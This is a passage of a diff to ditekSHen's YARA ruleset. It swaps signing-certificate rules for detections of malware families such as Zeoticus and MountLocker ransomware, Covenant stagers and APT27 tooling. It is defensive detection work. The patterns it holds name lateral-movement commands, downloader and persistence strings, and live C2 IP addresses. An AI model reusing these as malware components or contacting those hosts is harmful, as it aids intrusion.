+		$cnc2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" fullword wide
+		$cnc3 = "139.180.208.225" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" )
+		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 2 of ( $cnc* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_2Aaa455A172F7E3A2Dffb5C6B14F9C16 : FILE
+rule DITEKSHEN_MALWARE_Win_Dllhijacker02 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects ServiceCrt / DllHijacker03 IronTiger / LuckyMouse / APT27 malware"
 		author = "ditekSHen"
-		id = "81c115a7-7ddf-58ba-b56e-a92652c7f217"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "de5eee06-570a-5ec3-9e1b-13de4c4f260f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7487-L7499"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5512-L5527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd10d388e9122585c8e5b2073725f50edbc85d0ca1e94a4b034e500e0e89b608"
+		logic_hash = "d4eb236256c413d4d3223cc897783f5631c7798c0f3280e72d8c8504438fcaf9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "23c91b66bd07e56e60724b0064d4fedbdb1c8913"
-		hash1 = "7852cf2dfe60b60194dae9b037298ed0a9c84fa1d850f3898751575f4377215f"
-		importance = 20
+
+	strings:
+		$s1 = "ServiceCrtMain" fullword ascii
+		$s2 = "mpsvc.dll" fullword ascii
+		$o1 = { 84 db 0f 85 4c ff ff ff e8 14 06 00 00 8b f0 83 }
+		$o2 = { f7 c1 00 ff ff ff 75 c5 eb 13 0f ba 25 10 20 01 }
+		$o3 = { 8d 04 b1 8b d9 89 45 fc 8d 34 b9 a1 18 20 01 10 }
+		$o4 = { b0 01 c3 68 b8 2c 01 10 e8 83 ff ff ff c7 04 24 }
+		$o5 = { eb 34 66 0f 12 0d 00 fe 00 10 f2 0f 59 c1 ba cc }
+		$o6 = { 73 c7 dc 0d 4c ff 00 10 eb bf dd 05 34 ff 00 10 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM VILLAGE s.r.o." and pe.signatures [ i ] . serial == "2a:aa:45:5a:17:2f:7e:3a:2d:ff:b5:c6:b1:4f:9c:16" )
+		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 5 of ( $o* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_1Ef6392B2993A6F67578299659467Ea8 : FILE
+rule DITEKSHEN_MALWARE_Win_Zeoticus : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Zeoticus ransomware"
 		author = "ditekSHen"
-		id = "f5539ca9-d5cc-538e-8e53-3274791bfa2b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "6d1096dd-d075-54eb-ade9-48e2f945145d"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7501-L7513"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5529-L5549"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "eabfeb7abc968188276ba76cd94bd80aba340f5f920881fe13c0f7b093d65a55"
+		logic_hash = "588c140c141e82dae56758550549dfb96410db50521ac546477e1adc5575b4a0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e87d3e289ccb9f8f9caa53f2aefba102fbf4b231"
-		hash1 = "8282e30e3013280878598418b2b274cadc5e00febaa2b93cf25bb438ee6eb032"
-		importance = 20
+
+	strings:
+		$s1 = "Dear %s" fullword wide
+		$s2 = "\\??\\UNC\\%s\\%s\\" wide
+		$s3 = "\\\\%ws\\admin$\\%ws" wide
+		$s4 = "%s /node:\"%ws\" /user:\"%ws\" /password:" wide
+		$s5 = "process call create" wide
+		$s6 = ">----===Zeoticus" ascii
+		$s7 = "ZEOTICUSV2" ascii
+		$s8 = "GetExtendedTcpTable" fullword ascii
+		$s9 = "SHAMROckSWTF" ascii
+		$s10 = "NTDLL.RtlAllocateHeap" fullword ascii
+		$s11 = ".pandora" fullword wide
+		$s12 = { 70 00 20 00 72 00 20 00 69 00 20 00 76 00 20 00 65 00 20 00 74 }
+		$pdb = "_cryptor\\shell_gen\\Release\\" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" )
+		uint16( 0 ) == 0x5a4d and ( 6 of ( $s* ) or ( $pdb ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0F007898Afcba5F8Af8Ae65D01803617 : FILE
+rule DITEKSHEN_MALWARE_Win_Dlagent11 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects downloader agent"
 		author = "ditekSHen"
-		id = "1c3fddc2-3348-5f94-bf3e-5ce95b6ef009"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "c8bf9b1a-4ec1-5291-a334-82c79980ef53"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7515-L7527"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5551-L5564"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "260dbdd3d295ace9c478cc27061065803c159957a1eb2f7965ee2b358f02a73c"
+		logic_hash = "61df4855766050237c0b67bf70684020beb5d88f5928fa2814077e505be938a6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5687481a453414e63e76e1135ed53f4bd0410b05"
-		hash1 = "815f1f87e2df79e3078c63b3cb1ffb7d17fd24f6c7092b8bbe1f5f8ceda5df22"
-		importance = 20
+
+	strings:
+		$pdb = "\\loader2\\obj\\Debug\\loader2.pdb" ascii
+		$s1 = "DownloadFile" fullword ascii
+		$s2 = "ZipFile" fullword ascii
+		$s3 = "WebClient" fullword ascii
+		$s4 = "ExtractToDirectory" fullword ascii
+		$s5 = "System Clear" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( ( $pdb ) and 4 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Aa1D84779792B57F91Fe7A4Bde041942 : FILE
+rule DITEKSHEN_MALWARE_Win_Softcnapp : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects SoftCNApp"
 		author = "ditekSHen"
-		id = "57b4741a-a23d-51aa-ad83-3a7d80368290"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "473442e2-d411-5e2b-948e-c7ce034a5810"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7529-L7543"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5566-L5583"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2e57d646910c570f421939fd0d47ddee60bc38bb2ca2ba1991bf334cf8d5574b"
+		logic_hash = "2d7f4320282218842fa2e82906bcaf691610ad1a6ea257a2a9fc9e062229a2e8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6c15651791ea8d91909a557eadabe3581b4d1be9"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\.\\PIPE\\SOC%d" fullword ascii
+		$s2 = "Mozilla/5.0 (Windows NT 6.1)" fullword ascii
+		$s3 = "Param: sl=%d; sl=%d; sl=%d; sl=%d; sl=%d;" fullword ascii
+		$s4 = ".?AVCHPPlugin@@" fullword ascii
+		$s5 = ".?AVCHPCmd@@" fullword ascii
+		$s6 = ".?AVCHPExplorer@@" fullword ascii
+		$s7 = "%s\\svchost.exe -O" fullword wide
+		$s8 = "\"%s\\%s\" -P" fullword ascii
+		$n1 = "45.63.58.34" fullword ascii
+		$n2 = "127.0.0.1" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) )
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( all of ( $n* ) and 2 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0690Ee21E99B1Cb3B599Bba7B9262Cdc : FILE
+rule DITEKSHEN_MALWARE_Win_Covenantgruntstager : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Covenant Grunt Stager"
 		author = "ditekSHen"
-		id = "0fa2103e-c04e-5380-b4e3-6ac35f0b71d8"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "61495541-ed9c-5227-aa50-cbaeacfb20a2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7545-L7556"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5585-L5606"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "bc2aac1bd21f80d4233af37028820a36ebd56bceed9b1318e99e75b28b9408e3"
+		logic_hash = "638f63f605b21154f062b0f4d0659cd6cd87aee319debb2c1a991a679fec087a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ff9a35ef5865024e49096672ab941b5c120657b9"
-		importance = 20
+
+	strings:
+		$x1 = "VXNlci1BZ2VudA" ascii wide
+		$x2 = "cGFnZT17R1VJRH0mdj0x" ascii wide
+		$x3 = "0eXBlPXtHVUlEfSZ2PTE" ascii wide
+		$x4 = "tZXNzYWdlPXtHVUlEfSZ2PTE" ascii wide
+		$x5 = "L2VuLXVzL" ascii wide
+		$x6 = "L2VuLXVzL2luZGV4Lmh0bWw" ascii wide
+		$x7 = "L2VuLXVzL2RvY3MuaHRtbD" ascii wide
+		$s1 = "ExecuteStager" ascii
+		$s2 = "UseCertPinning" fullword ascii
+		$s3 = "FromBase64String" fullword ascii
+		$s4 = "ToBase64String" fullword ascii
+		$s5 = "DownloadString" fullword ascii
+		$s6 = "UploadString" fullword ascii
+		$s7 = "GetWebRequest" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xiamen Tongbu Networks Ltd." and pe.signatures [ i ] . serial == "06:90:ee:21:e9:9b:1c:b3:b5:99:bb:a7:b9:26:2c:dc" )
+		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or all of ( $s* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : FILE
+rule DITEKSHEN_MALWARE_Win_Fabookie : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Fabookie / ElysiumStealer"
 		author = "ditekSHen"
-		id = "41423db4-c475-558b-9a27-2b0ea59102ad"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dfa653c4-37d9-5e31-9c47-23adf751e4aa"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7558-L7569"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5608-L5624"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0fc85d3d01b37ff7870cade6f8e0e756593ff0b5c9eea3b687ff52985caa20dd"
+		logic_hash = "bbe10323817d501a361a33abf61a49ad59fcac69d78d9d9ec1744ee99a4b4629"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "c58bc4370fa01d9a7772fa8c0e7c4c6c99b90561"
-		importance = 20
+
+	strings:
+		$s1 = "rwinssyslog" fullword wide
+		$s2 = "_kasssperskdy" fullword wide
+		$s3 = "[Title:%s]" fullword wide
+		$s4 = "[Execute]" fullword wide
+		$s5 = "[Snapshot]" fullword wide
+		$s6 = "Mozilla/4.0 (compatible)" fullword wide
+		$s7 = "d-k netsvcs" fullword wide
+		$s8 = "facebook.websmails.com" fullword wide
+		$s9 = "CUdpClient::Start" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x0805 ) and 6 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00881573Fc67Ff7395Dde5Bccfbce5B088 : FILE
+rule DITEKSHEN_MALWARE_Win_Cobianrat : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects CobianRAT, a fork of Njrat"
 		author = "ditekSHen"
-		id = "10ef1865-9267-5f06-a1d5-9196b00f3dc6"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "5a9b6f04-fc52-52a9-b72f-d24dd093e886"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7571-L7585"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5626-L5640"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5b137cccecb16ad116b73fa1f9025f76846b85009fbd4962956499031d6eff35"
+		logic_hash = "5c8f55e5328b61c3591c876797b4521f8e98af7a6c53bab918f10d5c3c2b5013"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "31b3a3c173c2a2d1086794bfc8d853e25e62fb46"
-		importance = 20
+
+	strings:
+		$s1 = "1.0.40.7" fullword wide
+		$s2 = "DownloadData" fullword wide
+		$s3 = "Executed As" fullword wide
+		$s4 = "\\Plugins" fullword wide
+		$s5 = "LOGIN" fullword wide
+		$s6 = "software\\microsoft\\windows\\currentversion\\run" wide
+		$s7 = "Hidden" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_15C5Af15Afecf1C900Cbab0Ca9165629 : FILE
+rule DITEKSHEN_MALWARE_Win_Leivion : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Leivion"
 		author = "ditekSHen"
-		id = "795fa78b-0cd4-5eb4-9d37-72b5c38e7466"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "77800add-8fff-5657-9ed6-a23517bce0b1"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7587-L7599"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5660-L5673"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cfc72a85954cb12d89a09b47b5937216a7cfee4a71ac6335a2a94faadea1f68c"
+		logic_hash = "a0cda23df4301b66feedad7c04b4d051c07474ccaa07c05598dd0b47bb6fc7e6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "69735ec138c555d9a0d410c450d8bcc7c222e104"
-		hash1 = "2ae575f006fc418c72a55ec5fdc26bc821aa3929114ee979b7065bf5072c488f"
-		importance = 20
+
+	strings:
+		$s1 = "/var/lib/veil/go/src/runtime/mem_windows.go" fullword ascii
+		$s2 = "/var/lib/veil/go/src/internal/singleflight/singleflight.go" fullword ascii
+		$s3 = "/var/lib/veil/go/src/net/http/sniff.go" fullword ascii
+		$s4 = "/var/lib/veil/go/src/net/sendfile_windows.go" fullword ascii
+		$s5 = "/var/lib/veil/go/src/os/exec_" ascii
+		$s6 = "/var/lib/veil/go/src/runtime/mgcsweep.go" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_12705Fb66Bc22C68372A1C4E5Fa662E2 : FILE
+rule DITEKSHEN_MALWARE_Win_Banload : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Banload"
 		author = "ditekSHen"
-		id = "c9604f76-ad8a-5ac0-ba12-5030b12bedbf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "4672bce1-1280-576d-b7df-f0181a854058"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7601-L7613"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5675-L5688"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a212e491ce661dec5512f82eed42b1863afb75ce7fb185c41af178f3852b78c8"
+		logic_hash = "5cbc69d11b73f60d6eee3f23ed6cc217ba37a3408cb69e396e0394b5a1e20b75"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "288959bd1e8dd12f773e9601dc21c57678769909"
-		hash1 = "151b1495d6d1c68e32cdba36d6d3e1d40c8c0d3c12e9e5bd566f1ee742b81b4e"
-		importance = 20
+
+	strings:
+		$s1 = "main.die" fullword ascii
+		$s2 = "main.postResults" fullword ascii
+		$s3 = "main.checkin" fullword ascii
+		$s4 = "RegQueryValueExWRemoveDirectoryWSETTINGS_TIMEOUTTerminateProcessUpgrade RequiredUser-Agent: %s" ascii
+		$s5 = "pcuser-agentws2_32.dll (targetpc= DigestType ErrCode=%v" ascii
+		$s6 = "invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrie" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_205483936F360924E8D2A4Eb6D3A9F31 : FILE
+rule DITEKSHEN_MALWARE_Win_TYRAT : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects TYRAT"
 		author = "ditekSHen"
-		id = "5cce232b-4dfc-5931-a4ea-2e3df5616026"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "316c50cc-964e-5d24-b169-7a09fdf61638"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7615-L7627"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5690-L5703"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "09bf63b88eda95aae094cecb868838f08b88a6b4fe2993145e20293034c12863"
+		logic_hash = "b733b7aa3ba1195807fb728453c0f3f4df2177836054af6f7a863e14058884cb"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "430dbeff2f6df708b03354d5d07e78400cfed8e9"
-		hash1 = "e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e"
-		importance = 20
+
+	strings:
+		$s1 = "C:\\$MSIRecycle.Bin\\" fullword ascii
+		$s2 = "Range: bytes=%d-" fullword ascii
+		$s3 = "GET%sHTTP/1.1" fullword ascii
+		$s4 = "DllServer.dll" fullword ascii
+		$s5 = ".Bin\\bnch" ascii
+		$s6 = "User-Agent: wget" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURN CONSULTANCY LTD" and pe.signatures [ i ] . serial == "20:54:83:93:6f:36:09:24:e8:d2:a4:eb:6d:3a:9f:31" )
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_06Bcb74291D96096577Bdb1E165Dce85 : FILE
+rule DITEKSHEN_MALWARE_Win_Infinitylock : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects InfinityLock ransomware"
 		author = "ditekSHen"
-		id = "e7c24edc-2e59-5ee1-ad2f-d260b4014fdd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "7a66cc19-c635-580b-abc2-b58bd48673bd"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7629-L7641"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5705-L5723"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "34f533f7c7e12aaac9a1998654fae6ffde366affa90e9cba061b356fa7190e71"
+		logic_hash = "634759f1c2d48becebc9c87e146e898524071738f74b7001b112dc793bcb581c"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "d1bde6303266977f7540221543d3f2625da24ac4"
-		hash1 = "074cef597dc028b08dc2fe927ea60f09cfd5e19f928f2e4071860b9a159b365d"
-		importance = 20
+
+	strings:
+		$s1 = "_Encrypted$" fullword ascii
+		$s2 = "PublicKeyToken=" fullword ascii nocase
+		$s3 = "GenerateHWID" fullword ascii
+		$s4 = "CreateKey" fullword ascii
+		$d1 = "ProgrammFiles" fullword ascii
+		$d2 = "OneDrive" fullword ascii
+		$d3 = "ProgrammsX86" fullword ascii
+		$d4 = "UserDirs" fullword ascii
+		$d5 = "B_Drive" fullword ascii
+		$pdb1 = "F:\\DESKTOP!\\ChkDsk\\ChkDsk\\obj\\" ascii
+		$pdb2 = "\\ChkDsk\\obj\\Debug\\PremiereCrack.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 1 of ( $d* ) ) or ( 4 of ( $d* ) and 2 of ( $s* ) ) or ( any of ( $pdb* ) and 1 of ( $s* ) and 1 of ( $d* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_0D261C8470Adbb65800Ceaf3Eac70819 : FILE
+rule DITEKSHEN_MALWARE_Win_Mountlocker : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects MountLocker ransomware"
 		author = "ditekSHen"
-		id = "0304b3ae-6a3c-5831-a749-76432b3356b4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "0590d08d-1ee8-5dfe-af12-15b149acd2d6"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7643-L7655"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L5725-L5740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e71f5d24500ac202aad5a439aa0d5f1bf7e6259c1d7e11bb40c7b9ae93bd86c0"
+		logic_hash = "30bc601fef60cc1c9d8bff5dd3f8a53214f088b74eb24fe2369f5664613e0eaf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "307ef8a02a0fc9032591c624624fa3531c235aa1"
-		hash1 = "050dbd816c222d3c012ba9f2b1308db8e160e7d891f231272f1eacf19d0a0a06"
-		importance = 20
+
+	strings:
+		$s1 = "] locker.dir.check > " ascii wide
+		$s2 = "] locekr.kill." ascii wide
+		$s3 = "] locker.worm" ascii wide
+		$s4 = "%CLIENT_ID%" fullword ascii
+		$s5 = "RecoveryManual.html" ascii wide
+		$s6 = "RECOVERY MANUAL" ascii
+		$s7 = ".ReadManual.%0.8X" ascii wide
+		$s8 = "/?cid=%CLIENT_ID%" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company Corp." and pe.signatures [ i ] . serial == "0d:26:1c:84:70:ad:bb:65:80:0c:ea:f3:ea:c7:08:19" )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_40E27B7404Aa9B485F8A2Fc0C8E53Af3 : FILE
+rule DITEKSHEN_MALWARE_Win_Pingback : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PingBack ICMP backdoor"
 		author = "ditekSHen"
-		id = "1aee45e6-ff0b-56a6-a50e-284bf2122e3b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ecb313b6-f923-5b6d-a4d7-a4650817ed84"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7657-L7668"
